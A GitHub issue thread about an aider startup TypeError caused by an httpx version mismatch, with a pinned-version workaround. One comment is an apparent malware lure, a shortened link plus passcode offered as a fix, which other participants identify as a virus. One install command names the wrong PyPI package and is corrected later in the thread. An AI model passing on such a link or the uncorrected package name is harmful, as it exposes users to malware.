### ISSUE TITLE
Uncaught TypeError in http_handler.py line 20

### ISSUE THREAD

**Issue by MIKEk8** [paul-gauthier/aider#1390]
Aider version: <module 'aider.__version__' from 'C:\\Program Files\\Python311\\Lib\\site-packages\\aider\\__version__.py'>
Python version: 3.11.9
Platform: Windows-10-10.0.19045-SP0
Python implementation: CPython
Virtual environment: No
OS: Windows 10 (64bit)
Git version: git version 2.45.1.windows.1

An uncaught exception occurred:

```
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "__main__.py", line 7, in <module>
    sys.exit(main())
             ^^^^^^
  File "main.py", line 510, in main
    main_model = models.Model(args.model, weak_model=args.weak_model)
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "models.py", line 486, in __init__
    res = self.validate_environment()
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "models.py", line 660, in validate_environment
    res = litellm.validate_environment(model)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "llm.py", line 23, in __getattr__
    self._load_litellm()
  File "llm.py", line 30, in _load_litellm
    self._lazy_module = importlib.import_module("litellm")
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1204, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1176, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1147, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 690, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "__init__.py", line 8, in <module>
    from litellm.llms.custom_httpx.http_handler import AsyncHTTPHandler, HTTPHandler
  File "http_handler.py", line 20, in <module>
    _DEFAULT_TIMEOUT = httpx.Timeout(timeout=5.0, connect=5.0)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: Timeout.__init__() got an unexpected keyword argument 'connect'

```

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by MIKEk8** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

Don't download it. It's a virus

**Comment by fry69** [comment]
> Don't download it. It's a virus

Please don't full quote malware spam.

**Comment by MIKEk8** [comment]
python -m venv aider_env
aider_env\Scripts\activate
pip install aider
pip install httpx==0.27.2
aider

**Comment by fry69** [comment]
>  pip install aider

The aiders package in PyPI is called `aider-chat` -> https://pypi.org/project/aider-chat/

See also -> https://aider.chat/docs/install.html
